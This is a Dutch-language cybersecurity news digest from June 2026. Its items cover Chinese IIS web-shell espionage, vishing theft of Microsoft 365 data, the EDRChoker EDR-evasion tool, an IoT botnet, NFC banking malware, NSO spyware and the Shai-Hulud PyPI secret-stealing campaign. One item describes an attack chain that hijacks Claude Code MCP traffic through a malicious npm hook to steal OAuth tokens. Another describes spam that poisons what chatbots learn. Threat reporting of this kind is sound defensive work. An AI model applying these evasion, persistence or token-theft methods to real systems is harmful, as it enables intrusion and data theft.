Volgens een rapport van ReliaQuest voerde OP-512 hoogstwaarschijnlijk spionage uit via een gecompromitteerde IIS-webserver bij een organisatie waarvan de sector en geografie overeenkomen met de inlichtingenprioriteiten van China. Hoewel er geen overlappingen zijn gevonden tussen OP-512 en andere bekende Chinese adversarials, is het de vierde dergelijke dreigingsgroep - na CL-STA-0048, DragonRank en GhostRedirector - die zich de afgelopen twaalf maanden specifiek richt op IIS-webservers. Vorige maand onthulde Cisco Talos nog dat meerdere Chinese cybercrimegroepen een variant van malware genaamd BadIIS delen om IIS-servers te infecteren. Ook SHADOW-EARTH-053 heeft zich gericht op IIS-servers als onderdeel van een spionagecampagne die overheids- en defensiesectoren in Zuid-, Oost- en Zuidoost-Azië trof.

De kern van de operaties van OP-512 is een op maat gemaakt web shell framework, bestaande uit drie web shells. Deze geven de aanvallers toegang op afstand tot de gecompromitteerde host, terwijl stappen worden ondernomen om op handtekeningen gebaseerde detectie te omzeilen. Ze bemoeilijken forensische tijdlijnen door technieken zoals timestomping te gebruiken, waarbij de tijdstempels van web shell artefacten opzettelijk worden gemanipuleerd. Dit houdt concreet in dat alle bestanden en submappen rondom de geplaatste web shells worden gescand, de mediane 'laatst gewijzigd'-tijdstempel wordt berekend, en de eigen aanmaak- en wijzigingstijden worden overschreven om overeen te komen met deze waarde. Dit geeft de indruk dat de web shells al langere tijd aanwezig zijn op het systeem.

ReliaQuest merkte op dat dit framework capaciteiten combineert die zelden samen worden gezien. Elke implementatie wordt uniek gegenereerd, toegang is beperkt tot de aanvaller via cryptografische controles, en gecompromitteerde servers rapporteren automatisch terug voor gecentraliseerd beheer op schaal.

OP-512 vertoont tactische gelijkenis met CL-STA-0048, wat de mogelijkheid doet rijzen dat het een bestaande groep betreft die zijn toolset volledig heeft vernieuwd, of dat het deze capaciteiten onafhankelijk heeft ontwikkeld. Ongeacht de oorsprong wordt de hackinggroep beschouwd als een afzonderlijke cluster die autonoom opereert.

Bij de door het cybersecuritybedrijf geobserveerde aanval bleek de dreigingsactor zich te richten op een oudere IIS-server die draaide op Windows Server 2016 met het end-of-life .NET Framework 4.0. Er was bewijs van eerdere activiteit op dezelfde host, ongeveer 75 dagen voordat het hoofincident plaatsvond. Dit omvatte DNS-query's naar een ander, door de aanvaller gecontroleerd domein ("ashx.lhlsjcb[.]com").

De reeks acties die weken later volgde, wordt beschreven als een "sprint", waarbij de aanvaller het worker-proces van de webserver ("w3wp.exe") gebruikte om een van de web shells in de uploadmap van de applicatie te plaatsen. Dit activeerde op zijn beurt een zelfrapporterend mechanisme dat een DNS-query of een HTTP-verzoek als fallback gebruikt om de locatie van de web shell naar een door de aanvaller gecontroleerd domein te verzenden. De onderzoekers van ReliaQuest legden uit dat de drie web shells de aanvaller gezamenlijk bestandsbeheer, geauthenticeerde command-uitvoering via twee onafhankelijke toegangspaden, en geautomatiseerde rapportage van de compromittering gaven, nog voordat iemand tijd had om te reageren.

Nadat de web shells waren geïmplementeerd, heeft OP-512 geprobeerd privileges te escaleren naar het SYSTEM-niveau met behulp van de Potato Suite. Vervolgens werden commando's zoals "whoami /priv" uitgevoerd om de systeemrechten te bevestigen. ReliaQuest stelt dat vier aan China gerelateerde clusters die dezelfde technologie in minder dan een jaar tijd aanvallen, waarschijnlijk geen toeval is. Internet-gerichte IIS-servers die verouderde, niet-ondersteunde software draaien, blijven een voorkeurstoegangspunt binnen dit dreigingsecosysteem en vertonen geen tekenen van vertraging. Het meest zorgwekkende aan OP-512 is dat deze dreigingsgroep geen standaard tools gebruikt, maar een speciaal gebouwd framework dat is ontworpen om de detectiemethoden te omzeilen die effectief zijn tegen de andere drie clusters. Organisaties die hun verdediging hebben afgestemd op bekende actoren, zijn hier waarschijnlijk niet tegen gedekt.

 

Bron: ReliaQuest

07 juni 2026 | Nieuwe 'Pink' groep steelt Microsoft 365 cloud data via vishing

Een nieuwe cybercrime groep, genaamd Pink, richt zich op bedrijfsdata voor financiële afpersing. De onderzoekstak van Palo Alto Networks, Unit 42, heeft deze dreiging als eerste blootgelegd. De groep wordt vermoedelijk gelinkt aan het bredere Com netwerk en door de onderzoekers gevolgd onder de cluster code CL-CRI-1147. Op 31 mei 2026 lanceerde Pink een speciale data lek site, waarop de namen van diverse eerste slachtoffers verschenen. Voortbouwend op de data van Unit 42, publiceerde beveiligingsanalysebedrijf Gurucul op 4 juni 2026 een aanvullende analyse om bedrijven te helpen de sporen van de groep binnen bedrijfsnetwerken te detecteren.

Uit onderzoek van Unit 42 blijkt dat Pink traditionele malware payloads vermijdt. In plaats daarvan vertrouwen de dreigingsactoren op voice phishing, of vishing, om zakelijke gebruikers te targeten. Door zich telefonisch voor te doen als interne ICT-medewerkers, manipuleren de hackers werknemers om frauduleuze inlogpagina's te bezoeken, zoals passkeyadd.com of passkeydeploy.com.

Wanneer een werknemer in de val trapt en zijn gegevens invoert, stelen de hackers de actieve inlogsessie. Dit stelt hen in staat om de meervoudige authenticatie te omzeilen. Vervolgens krijgen zij toegang tot het Microsoft 365 systeem van het bedrijf en gebruiken zij de eigen geautomatiseerde tools van Microsoft om cloud opslag te doorzoeken. Binnen enkele minuten worden gevoelige bestanden uit OneDrive en SharePoint mappen gehaald.

Zodra de data is veiliggesteld, begint de afpersing. Pink gebruikt de gecompromitteerde werknemersaccounts om e-mails naar collega's te sturen en interne Microsoft Teams berichten te verzenden, waarin betaling wordt geëist. Bestuurders krijgen een strakke deadline van 72 uur om te reageren.

Na de openbaarmaking door Unit 42 analyseerde Gurucul hoe Pink na de initiële toegang opereert op lokale werkstations. In een advies dat op 4 juni 2026 werd gepubliceerd, merkte Gurucul op dat Pink bestandsloze methoden gebruikt om verborgen te blijven. In plaats van een omvangrijk, opvallend virus op een harde schijf te downloaden, implementeren de hackers kleine code commando's die zich verbergen in legitieme systeempaden. De software bouwt zijn hoofdcode direct op in de tijdelijke geheugencache van de computer, waardoor deze volledig onzichtbaar is voor standaard antivirus mapscanners. Gurucul ontdekte ook dat de code eerst de computeromgeving controleert; als het een sandbox of een analyse laboratorium van beveiligingsteams detecteert, verbergt het zijn gedrag.

Omdat Pink legitieme cloud tools en authentieke accounttoegang gebruikt, hebben standaard firewalls moeite om de dreiging te detecteren. Experts adviseren werknemers te trainen om onverwachte telefoontjes van de ICT-afdeling onafhankelijk te verifiëren. Degenen die verantwoordelijk zijn voor netwerkbeveiliging moeten ook zoeken naar ongebruikelijke geautomatiseerde scripts in hun logs, de bekende webdomeinen van de groep blokkeren en gedragsmonitoring gebruiken om massale, plotselinge bestand downloads te onderscheppen voordat de data het bedrijf verlaat.

 

Bron: Palo Alto Networks' Unit 42 | Bron 2: github.com | Bron 3: gurucul.com

08 juni 2026 | Hackers kunnen Claude Code MCP-verkeer kapen voor diefstal OAuth-tokens

Onderzoekers van Mitiga Labs hebben een aanvalsketen van vijf stappen gedemonstreerd waarmee het Model Context Protocol (MCP)-verkeer van Claude Code ongemerkt kan worden omgeleid naar infrastructuur van een aanvaller. Daarbij worden OAuth-bearertokens onderschept die persistente en brede toegang verlenen tot gekoppelde SaaS-platforms zoals Jira, Confluence en GitHub.

De aanval kan alleen slagen als het slachtoffer eerst een kwaadaardig npm-pakket installeert. Dat pakket bevat een postinstall-hook die ongemerkt het lokale configuratiebestand van Claude Code, ~/.claude.json, herschrijft en de MCP-server laat verwijzen naar een proxy van de aanvaller. Het gaat dus niet om een fout op afstand in Claude Code zelf, maar om een techniek voor tokendiefstal en persistentie nadat de werkomgeving al is gecompromitteerd.

Zodra Claude Code een MCP-sessie opzet of vernieuwt, loopt het verkeer via die proxy en belandt het token bij de aanvaller. Roteert de gebruiker het token of past hij de configuratie aan, dan herstelt de hook de kwaadaardige instelling bij de volgende keer laden. Omdat de verzoeken via de vertrouwde uitgaande verbindingen van de aanbieder verlopen, zijn ze in logbestanden lastig te onderscheiden van legitiem verkeer.

Mitiga Labs meldde de bevindingen op 10 april 2026 aan Anthropic, de ontwikkelaar van Claude Code. Anthropic beoordeelde de melding op 12 april 2026 als buiten de scope van het beveiligingsprogramma en noemde het gedrag bewust ontworpen, omdat de gebruiker eerst zelf het pakket installeert en de MCP-server toestemming geeft. Er is daarom geen patch aangekondigd. Organisaties die Claude Code koppelen aan platforms als Jira, Confluence en GitHub kunnen het risico beperken door uitsluitend vertrouwde pakketten te installeren, het bestand ~/.claude.json te bewaken en de verleende MCP-autorisaties periodiek te controleren.

 

Bron: Mitiga Labs

08 juni 2026 | Nieuwe EDRChoker tool misbruikt Windows QoS om EDR-agenten te omzeilen

Op 08 juni 2026 is een nieuwe open source red team tool uitgebracht genaamd EDRChoker. Deze tool introduceert een innovatieve methode om cloud gekoppelde Endpoint Detection and Response (EDR) agenten te neutraliseren. In tegenstelling tot traditionele methoden, zoals het beëindigen van processen of het injecteren van code, werkt EDRChoker door de netwerkbandbreedte van deze EDR-agenten stilletjes te beperken tot vrijwel nul.

De techniek maakt gebruik van de native Policy-Based Quality of Service (QoS) engine van het besturingssysteem van Windows. Door de bandbreedte te 'verstikken', wordt de communicatie van de EDR-agenten met hun cloud backend effectief lamgelegd. Dit betekent dat de EDR-oplossingen hun detectiegegevens niet meer kunnen versturen en geen commando's meer kunnen ontvangen, waardoor ze hun functionaliteit verliezen zonder dat de processen direct worden afgesloten.

De tool is ontwikkeld door beveiligingsonderzoeker @TwoSevenOneT en exploiteert een ingebouwde functionaliteit van het besturingssysteem van Windows. Het succesvol toepassen van EDRChoker biedt aanvallers een discrete manier om detectiemechanismen te omzeilen, wat de persistentie en onopgemerktheid van kwaadaardige activiteiten op een gecompromitteerd systeem aanzienlijk kan vergroten. Deze methode vormt een nieuwe uitdaging voor organisaties die vertrouwen op EDR-oplossingen voor hun beveiliging.

 

Bron: Zerosalarium

08 juni 2026 | C0XMO botnet verspreidt via DD-WRT routerkwetsbaarheid en schakelt rivaliserende malware uit

Onderzoekers van Fortinet hebben een nieuwe variant van het Gafgyt botnet ontdekt, genaamd C0XMO, die zich richt op DD-WRT router firmware en de capaciteit heeft om zich te verspreiden naar andere apparaattypen met diverse CPU-architecturen. Er zijn voorbeelden gevonden voor architecturen zoals ARM, MIPS, PowerPC, SuperH, x86 en x86_64, waarbij exploits worden ingezet tegen DVR's, routers, video management platformen en op Android gebaseerde apparaten. Hoewel het botnet aanvankelijk werd waargenomen bij een Japans technologiebedrijf, bleek het bron-IP-adres te zijn gekoppeld aan een apparaat in Duitsland.

C0XMO onderscheidt zich door zijn modulaire ontwerp, waardoor de beheerders de exploitatietechnieken kunnen actualiseren, doelgerichte architecturen kunnen toevoegen of verwijderen, en de mogelijkheden voor laterale beweging kunnen uitbreiden, onafhankelijk van de hoofdbenadering. Het primaire doel van C0XMO blijft het lanceren van gedistribueerde denial-of-service (DDoS)-aanvallen, waarbij het negentien verschillende methoden ondersteunt, waaronder UDP/TCP/SYN/ICMP floods, de "ping of death", NTP/Memcached amplificatie, Discord voice UDP floods en Valve-specifieke floods.

De verspreiding van de C0XMO botnet malware vindt plaats door misbruik te maken van CVE-2021-27137. Dit is een buffer overflow kwetsbaarheid die voortkomt uit onvoldoende validatie van gebruikersinvoer. De kwetsbaarheid kan zonder authenticatie worden misbruikt en leidt tot de uitvoering van willekeurige code. Voor een bredere distributie downloadt C0XMO een Python script dat aanvullende pakketten installeert, zoals 'requests', 'paramiko' en 'beautifulsoup4'. Deze pakketten zijn essentieel voor netwerkscanning, communicatie en het uitvoeren van activiteiten via SSH- en Telnet protocollen.

De scanner van C0XMO gebruikt vervolgens worker threads om willekeurig internetgerichte systemen te scannen op veelvoorkomende poorten zoals 22 (SSH), 23 (Telnet), 80/443 (HTTP/HTTPS), 7547, 8080, 8443 en 8888. Na het vinden van een doelwit probeert de malware zwakke Telnet- en SSH-inloggegevens te kraken via brute force, detecteert het de CPU-architectuur en implementeert een compatibele C0XMO binary. Het script bevat bijna twee dozijn functies voor diverse taken, waaronder scanning, het exploiteren van op HTTP en ADB gebaseerde kwetsbaarheden, het detecteren van de CPU-architectuur, SSH/Telnet-login en het controleren van IP-adressen. Het hoofddoel is laterale beweging binnen het netwerk.

Zodra de malware toegang heeft verkregen tot een apparaat, kopieert het zichzelf naar verborgen locaties zoals '/tmp/.sys', '/var/tmp/.sys' en '/dev/shm/.sys'. Vervolgens creëert het cron jobs die de malware elke vijftien minuten opnieuw starten, en worden shell opstartbestanden aangepast om automatische uitvoering mogelijk te maken.

Een opvallend kenmerk van C0XMO is zijn vermogen om actief draaiende processen te scannen om concurrerende botnet clients op de host te identificeren. Het detecteert ook tools van red teams, programmeertools en netwerkservices die de werking kunnen verstoren, en beëindigt deze. Dit gebeurt door het verwijderen van binaries en het wissen van hun persistentie mechanismen, inclusief cron jobs, initialisatiescripts, systeemservices en shell profielvermeldingen. Hierna maakt C0XMO verbinding met een hardcoded command-and-control (C2) adres via een aangepaste multi-stage handshake, die gebruikmaakt van 'magic strings' en gedeelde geheimen, waarna het wacht op commando's. De ondersteunde commando's omvatten heartbeat-checks, het starten en stoppen van scans, en het lanceren van DDoS aanvallen met een van de negentien beschikbare methoden.

Fortinet omschrijft C0XMO als een botnet met "een aanzienlijk geavanceerdere architectuur en feature set vergeleken met eerdere IoT botnets." De onderzoekers merken op dat het algehele ontwerp van de malware duidt op "een grotere operationele verfijning en complexiteit dan typische Gafgyt malware." De algemene aanbeveling ter verdediging tegen C0XMO en andere botnet malware is om apparaten up-to-date te houden, unieke inloggegevens voor beheerders te gebruiken en toegang op afstand uit te schakelen wanneer dit niet noodzakelijk is.

 

Bron: Fortinet

08 juni 2026 | Spambots manipuleren chatbots via 'Answer Engine Optimization'

De opkomst van chatbots zoals ChatGPT en Google Gemini heeft geleid tot een nieuw fenomeen genaamd 'Answer Engine Optimization' (AEO). Dit bouwt voort op het bekende concept van Search Engine Optimization (SEO), waarbij content wordt geoptimaliseerd om goed gevonden te worden door zoekmachines. Bij AEO is het echter het doel om chatbots van AI te beïnvloeden.

Mensen en organisaties vullen specifieke delen van het internet met teksten, in de hoop dat modellen van AI deze informatie als waarheid overnemen. Het uiteindelijke doel is dat de chatbots deze gemanipuleerde teksten vervolgens doorgeven aan miljoenen gebruikers die de AI om informatie vragen. Dit mechanisme wordt misbruikt door spambots die actief proberen de output van chatbots van AI te sturen.

Deze ontwikkeling vormt een potentiële uitdaging voor de betrouwbaarheid van door AI gegenereerde informatie. Het risico bestaat dat chatbots onbedoeld desinformatie of bevooroordeelde content verspreiden die door derden via technieken van AEO is geïnjecteerd. Als reactie hierop hebben moderators van betrokken Reddit-gemeenschappen het plaatsen van losse berichten over de getroffen onderwerpen beperkt, terwijl Reddit zelf zegt te blijven investeren in spamdetectie en moderatie om de integriteit van de gegevens die aan modellen van AI worden gevoed te beschermen.

 

Bron: BNR Nieuwsradio

09 juni 2026 | 21 zero-day kwetsbaarheden in FFmpeg ontdekt, inclusief kritieke RCE

Een autonome AI-beveiligingsagent van het beveiligingsbedrijf Depthfirst heeft onlangs 21 zero-day kwetsbaarheden ontdekt in FFmpeg, een van 's werelds meest gebruikte bibliotheken voor mediaprocessing. Deze bibliotheek vormt de stille kracht achter mediatoepassingen in een breed scala aan systemen, waaronder webbrowsers, streaming platforms, bewakingssystemen en cloud infrastructuur. De ontdekking van deze kwetsbaarheden onderstreept de cruciale rol van FFmpeg in de hedendaagse digitale infrastructuur en de potentiële impact van beveiligingslekken daarin.

Onder de ontdekte kwetsbaarheden bevindt zich een bijzonder kritieke kwetsbaarheid, namelijk een heap buffer overflow die kan leiden tot remote code execution (RCE). Deze specifieke kwetsbaarheid is opmerkelijk omdat deze kan worden geactiveerd met een enkel netwerkpakket van slechts 183 bytes. Een succesvolle exploitatie van een dergelijke RCE kwetsbaarheid stelt aanvallers in staat om op afstand willekeurige code uit te voeren op getroffen systemen, wat kan leiden tot volledige controle over het systeem.

De aard van deze zero-day kwetsbaarheden, die reeds actief misbruikt kunnen worden voordat er patches beschikbaar zijn, maakt ze extreem gevaarlijk. Gezien de wijdverspreide implementatie van FFmpeg in diverse kritieke systemen, van consumentenapparaten tot grootschalige cloud omgevingen, heeft de ontdekking van deze 21 zero-days verstrekkende implicaties voor de mondiale cybersecurity. Het benadrukt de noodzaak voor snelle patching en mitigatiestrategieën zodra oplossingen beschikbaar komen.

 

Bron: Depthfirst

09 juni 2026 | Toename phishing via Microsoft Teams met IT-impersonatie

Dreigingsactoren verschuiven hun aandacht van traditionele e-mailphishing naar samenwerkingstools zoals Microsoft Teams, zo blijkt uit onderzoek. Criminelen maken gebruik van de hogere mate van vertrouwen die gebruikers hebben in deze interne communicatiekanalen om succesvolle social engineering aanvallen uit te voeren. Dit fenomeen is waargenomen door het Unit 42 Threat Research Center.

Een veelvoorkomend scenario begint met een bericht via Microsoft Teams, afkomstig van wat lijkt op de interne IT-afdeling of een externe IT-dienstverlener. Het bericht, vaak getagd als 'extern', informeert de gebruiker over een vermeend probleem met hun account, zoals een gedetecteerde inloganomalie. De aanvaller vraagt vervolgens de gebruiker om een multi-factor authenticatie (MFA) prompt goed te keuren om hun identiteit te bevestigen. Achter de schermen is de compromittering dan al in volle gang. Deze benadering is bijzonder effectief omdat gebruikers minder waakzaam zijn voor berichten binnen samenwerkingstools dan voor e-mails, waarvoor ze vaak getraind zijn op phishing-indicatoren.

Recente incidenten bevestigen deze trend. De dreigingsactor Cloaked Ursa, ook bekend als APT29, Cozy Bear en Midnight Blizzard, heeft deze methode eind 2024 succesvol toegepast. Zij gebruikten gecompromitteerde accounts om berichten te versturen met kwaadaardige links die slachtoffers naar nagemaakte Microsoft inlogpagina's leidden om inloggegevens te oogsten. In december 2025 imiteerde een dreigingsgroep, gevolgd door Mandiant als UNC6692, IT-helpdeskmedewerkers via Microsoft Teams. Deze groep overtuigde medewerkers om een chatuitnodiging te accepteren van een account buiten hun organisatie.

De cijfers onderstrepen de verschuiving. In de eerste vier maanden van 2026 vertegenwoordigden phishing-waarschuwingen van samenwerkingstools 42% van alle phishing-waarschuwingen in het Cortex-platform, een stijging van 30% in de vier maanden daarvoor. Organisaties hebben vooruitgang geboekt in de preventie van e-mailphishing door slimmere e-mailgateways en bewustzijnstrainingen, maar deze maatregelen gelden minder sterk voor samenwerkingstools.

Dreigingsactoren passen verschillende technieken toe om hun identiteit te verhullen en legitiem over te komen. Dit omvat het gebruik van typosquatted domeinen die sterk lijken op die van vertrouwde leveranciers of interne naamgevingsconventies. Soms opereren zij vanuit Microsoft 365 tenants die geen eerdere band hebben met de doelorganisatie, en die bewust zijn genoemd om IT-ondersteuningsfuncties, beveiligingsteams of managed service providers na te bootsen. In veel organisaties is Teams-federatie standaard ingeschakeld, wat communicatie met externe tenants mogelijk maakt tenzij dit expliciet door beleid wordt beperkt. In meer geavanceerde gevallen omzeilen aanvallers de noodzaak tot misleiding door legitieme accounts van dienstverleners of partners te compromitteren en bestaande vertrouwensrelaties te benutten om chats te initiëren vanaf vertrouwde domeinen.

 

Bron: Unit 42 | Bron 2: support.microsoft.com | Bron 3: learn.microsoft.com

09 juni 2026 | Nieuwe NFCShare Android malware verspreidt via valse bankapp-updates op GitHub

Nieuwe varianten van de NFCShare malware voor Android worden verspreid als valse updates voor legitieme apps van banken, gehost op GitHub. De malware is geëvolueerd en richt zich nu op klanten van diverse banken en financiële instellingen in heel Europa via een phishingcampagne die gericht is op het stelen van gegevens van betaalkaarten.

Na het misleiden van slachtoffers met een vals verificatiescherm om hun kaarten dicht bij de Near-Field Communication (NFC) chip van het mobiele apparaat te plaatsen, leest NFCShare de informatie uit. Dit gebeurt met behulp van de IsoDep-interface van Android en EMV-commando's. De malware steelt het kaartnummer, het type kaart, de vervaldatum en een viercijferige pincode die door het slachtoffer wordt ingevoerd onder het mom van een beveiligingsstap. Deze gegevens worden vervolgens via een WebSocket-kanaal naar de command-and-control (C2) host van de aanvaller gestuurd. De aldus verzamelde informatie kan daarna worden gebruikt in NFC-betaalrelaisconstructies, vergelijkbaar met de eerder gedocumenteerde NGate, SuperCard X en RelayNFC aanvallen met malware.

NFCShare werd voor het eerst gedocumenteerd door onderzoekers van D3Lab in januari 2026. Zij volgen sindsdien de activiteit en evolutie van de malware. D3Lab-onderzoeker Andrea Draghetti merkte op dat, ondanks overeenkomsten met andere Android malware die NFC-chips misbruiken voor gegevensdiefstal, NFCShare onderscheidende code, bibliotheken, architectuur en implementatiedetails gebruikt. Hij sluit echter niet uit dat het een evolutie kan zijn binnen hetzelfde ecosysteem, gedreven door dezelfde dreigingsactoren.

Recente NFCShare aanvallen, die vanaf 14 mei zijn waargenomen, beginnen met het bezoek van het slachtoffer aan een phishingwebsite die een echte bank imiteert en om bankgegevens vraagt. Slachtoffers worden vervolgens aangespoord om hun bankapp bij te werken en worden omgeleid naar een GitHub-repository die een malafide APK-bestand host. Onderzoekers merken op dat sms-berichten of telefoongesprekken van nepvertegenwoordigers van banken ook kunnen worden ingezet als onderdeel van het social engineering-proces, hoewel D3Lab deze methoden niet direct heeft waargenomen bij de recente aanvallen.

Sinds de creatie op 10 april heeft de GitHub-repository die wordt gebruikt voor de distributie van NFCShare 56 unieke APK's gehost. Deze imiteerden mobiele apps voor banken, voornamelijk uit Italië en Spanje, waaronder apps zoals Intesa Carte.apk, Sella Carte.apk, Banca Sella Carte.apk, Nexi Carte.apk, Fideuram Carte.apk, Mooney Carte.apk, CaixaBank.apk, CaixaBankNfc.apk en CaixaReactivaTarjeta.apk. In januari meldde D3Lab dat de malware zich alleen richtte op Deutsche Bank in Duitsland, wat duidt op een uitgebreidere targeting.

Een interessant aspect van de nieuwe versie van de malware is de introductie van misvormde APK-verpakking om geautomatiseerde analyse, en mogelijk ook beveiligingstools, te hinderen. Hoewel de APK nog steeds een ZIP-archief is, bevatten de nieuwere samples vergiftigde of misvormde bestandspaden binnen de ZIP. Dit veroorzaakt dat sommige extractietools interne relatieve paden verkeerd interpreteren als bestandssysteempaden en fouten genereren. D3Lab merkt echter op dat deze truc handmatige analyse of herstel van code niet verhindert; het verstoort eerder statische analyse in bepaalde tools.

Android-gebruikers wordt geadviseerd om apps van banken alleen via Google Play te downloaden, Play Protect in te schakelen en voorzichtig te zijn met verificatieverzoeken die vragen om NFC-kaartscans.

 

Bron: D3Lab | Bron 2: hubs.li

09 juni 2026 | WhatsApp blokkeert Pegasus spyware campagne van NSO Group

WhatsApp heeft een nieuwe spyware campagne, gelinkt aan het Israëlische surveillance bedrijf NSO Group, verstoord en vraagt nu een Amerikaanse federale rechtbank om het bedrijf te veroordelen wegens minachting van een permanent bevel. Deze actie volgt op een eerdere juridische overwinning voor WhatsApp en moederbedrijf Meta in hun langlopende zaak tegen NSO Group. De rechtbank had NSO al verboden om WhatsApp of haar gebruikers te targeten, nadat was vastgesteld dat het bedrijf federale en staatshackingwetten had overtreden in verband met een aanval in 2019 op ongeveer 1.400 gebruikers.

Ditmaal stelt WhatsApp dat de activiteit niet afhankelijk was van een onbekende WhatsApp kwetsbaarheid. Het bedrijf heeft meldingen van gebruikers onderzocht en spear phishing inspanningen ontdekt die mensen probeerden te verleiden naar kwaadaardige externe websites. Het doel was om gebruikers op een link buiten WhatsApp te laten klikken, een methode die vergelijkbaar is met eerdere één klik campagnes die aan NSO zijn gekoppeld.

In een persbericht dat vandaag werd gepubliceerd, meldde WhatsApp ook dat het testaccounts en groepen die op haar platform waren aangemaakt, heeft gevonden en verwijderd. Het bedrijf heeft drie domeinen gepubliceerd die volgens hen bij de activiteit zijn gebruikt, zodat onderzoekers, bedrijven en gebruikers kunnen controleren of zij via WhatsApp, sms, e-mail of een ander kanaal zijn benaderd. De door WhatsApp genoemde domeinen zijn: `fr24cast.com`, `ghazacast.com` en `ikhwancast.com`.

John Scott Railton, een senior onderzoeker bij Citizen Lab, merkte op dat de nieuwe claims juridisch en beleidsmatig zwaar wegen, omdat ze komen op een moment dat NSO Group probeert zichzelf als "hervormd" te presenteren. Hij voegde eraan toe dat het domein "fr24cast" mogelijk bedoeld was om France 24 te imiteren, hoewel dit niet door WhatsApp is bevestigd. Het geschil spitst zich nu toe op de vraag of een spyware leverancier een gerechtelijk bevel kan negeren en dezelfde dienst kan blijven onderzoeken die het verboden was te benaderen. WhatsApp wil dat de rechter de recente activiteit behandelt als een schending van het bevel, en niet als een nieuw incident dat vanaf de basis moet worden beargumenteerd.

Sinds 2021 staat NSO Group onder Amerikaanse handelsbeperkingen, toen het Ministerie van Handel het bedrijf toevoegde aan de Entity List vanwege spyware die aan buitenlandse regeringen werd geleverd. Amerikaanse functionarissen stelden dat de tools waren gebruikt om journalisten, ambtenaren, activisten, academici, zakenmensen en ambassadepersoneel te targeten.

WhatsApp benadrukt dat dit meer is dan een WhatsApp probleem, en stelt dat mercenary spyware een bedreiging blijft vormen voor gebruikers, bedrijven en overheden, die geen enkel bedrijf alleen kan bestrijden. Tegelijkertijd blijven WhatsApp berichten en gesprekken standaard beschermd door end-to-end encryptie. Gebruikers met een hoger risico wordt geadviseerd om hun apparaten up-to-date te houden, verdachte activiteiten te melden en strengere accountinstellingen te gebruiken. Meta ondersteunt ook extern spyware onderzoek en heeft aangekondigd te doneren aan het Spyware Accountability Initiative, dat groepen ondersteunt die zich richten op forensische analyse, slachtofferhulp en beleidswerk.

Het bedrijf haalde eerdere zero-day bevindingen van Citizen Lab aan die leidden tot Apple beveiligingsupdates, samen met een recente Griekse strafrechtelijke veroordeling van Intellexa spyware executives, als voorbeelden van succesvol maatschappelijk werk. De nieuwe aanklacht zet ook verdere druk op het argument van NSO dat het moet worden behandeld als een legitieme beveiligingsleverancier die overheidscliënten bedient. De gevolgen voor het spyware bedrijf hangen nu mogelijk minder af van de spyware capaciteit en meer van de vraag of een federale rechter akkoord gaat dat het bedrijf een reeds door de rechtbank getrokken lijn heeft overschreden. Niettemin moeten WhatsApp gebruikers voorzichtig zijn met verdachte links, zelfs als deze afkomstig lijken te zijn van bekende contacten of in berichten verschijnen die verband lijken te houden met actuele gebeurtenissen. De kwaadaardige domeinen die door WhatsApp zijn gedeeld, lijken ook te verwijzen naar Gaza en de Moslimbroederschap. Eén domein gebruikt "Ikhwan" (إخوان), wat "broeders" betekent in het Arabisch en vaak wordt gebruikt om te verwijzen naar de Moslimbroederschap, een belangrijke transnationale islamitische politieke organisatie.

 

Bron: WhatsApp | Bron 2: about.fb.com | Bron 3: commerce.gov

09 juni 2026 | Nieuwe Shai-Hulud aanval infecteert 19 PyPI-pakketten gericht op wetenschap

Hackers hebben negentien pakketten op de Python Package Index (PyPI) gecompromitteerd in een nieuwe supply chain aanval die bekendstaat als "Shai-Hulud". Deze pakketten zijn gezamenlijk honderdduizenden keren gedownload en bevatten malware die is ontworpen om secrets van ontwikkelaars te stelen. Veel van de geïnfecteerde pakketten zijn populaire bio-informatica tools, waaronder Dynamo, Spateo, CoolBox, U-FISH en Napari-UFISH.

De nieuwe campagne werd ontdekt door het applicatiebeveiligingsbedrijf Socket. Onderzoekers attribueren de aanval aan één enkele maintainer, die verantwoordelijk is voor 37 kwaadaardige releases verspreid over de negentien pakketten. De malafide artefacten omvatten een `*-setup.pth` bestand en een geobfusceerde JavaScript payload genaamd `_index.js`. De malware wordt geactiveerd zodra een gebruiker Python start, waarna het `PTH` bestand de Bun JavaScript runtime van GitHub probeert te downloaden om het gebundelde script uit te voeren. Socket waarschuwt dat een gecompromitteerde 'wheel' (een distributieformaat voor Python-pakketten) een anders passieve afhankelijkheidsinstallatie kan omzetten in een vertraagde uitvoertrigger, waarbij elke volgende Python-, pip-, test-run, notebook kernel-, CI-job- of package management command die Python start, het malafide `.pth` bestand kan verwerken.

Deze aanval wordt beschouwd als onderdeel van de bredere "Shai-Hulud" campagne, gezien de overeenkomsten in gebruikte technieken met eerdere aanvallen. Socket volgt deze nieuwe golf naast eerdere incidenten, waardoor het totale aantal malafide artefacten dat aan Shai-Hulud activiteiten wordt toegeschreven, nu op 453 items staat.

Een analyse van de JavaScript payload onthulde dat deze gericht is op een breed scala aan secrets van ontwikkelaars. Hieronder vallen GitHub tokens en GitHub Actions secrets, publicatie-tokens voor npm, PyPI, RubyGems en JFrog, credentials voor AWS, GCP, Azure, Kubernetes en Vault, SSH sleutels, Docker credentials, `.env`, `.npmrc`, `.pypirc` bestanden, Shell histories, configuratiebestanden van Claude/MCP, en andere secrets van ontwikkelaarswerkstations en CI/CD-omgevingen.

Het primaire doel van de aanval is het compromitteren van softwareontwikkelingsworkflows om de malware verder te verspreiden. De belangrijkste methode voor data-exfiltratie is vergelijkbaar met eerdere Shai-Hulud operaties, waarbij automatisch aangemaakte GitHub repositories worden gebruikt om via GitHub Actions de gestolen secrets te hosten. Een secundaire exfiltratiemethode maakt gebruik van directe HTTPS naar een legitiem, maar ongeldig Anthropic API endpoint (api[.]anthropic[.]com/v1/api), wat volgens Socket waarschijnlijk als camouflage dient.

De malware beschikt tevens over ontwijkingsmechanismen, zoals het controleren op Russische locales/omgevingen en security tools zoals StepSecurity Harden-Runner. Persistentie wordt bewerkstelligd via systemd services op Linux en LaunchAgents op macOS, terwijl ook GitHub workflow- en Claude/MCP-configuratiebestanden worden misbruikt.

Socket adviseert organisaties die de getroffen pakketten hebben geïnstalleerd om alle secrets te roteren en hun omgevingen te herstellen van veilige backups. Verdedigers moeten alert zijn op Python pakketten die uitvoerbare `.pth` startup hooks bevatten, onverwachte downloads van de Bun JavaScript runtime van GitHub, en procesketens waarbij Python Bun lanceert om `_index.js` uit te voeren.

 

Bron: Socket | Bron 2: hubs.li

09 juni 2026 | AI model 'Mythos' creëert nieuwe dreiging voor open source software

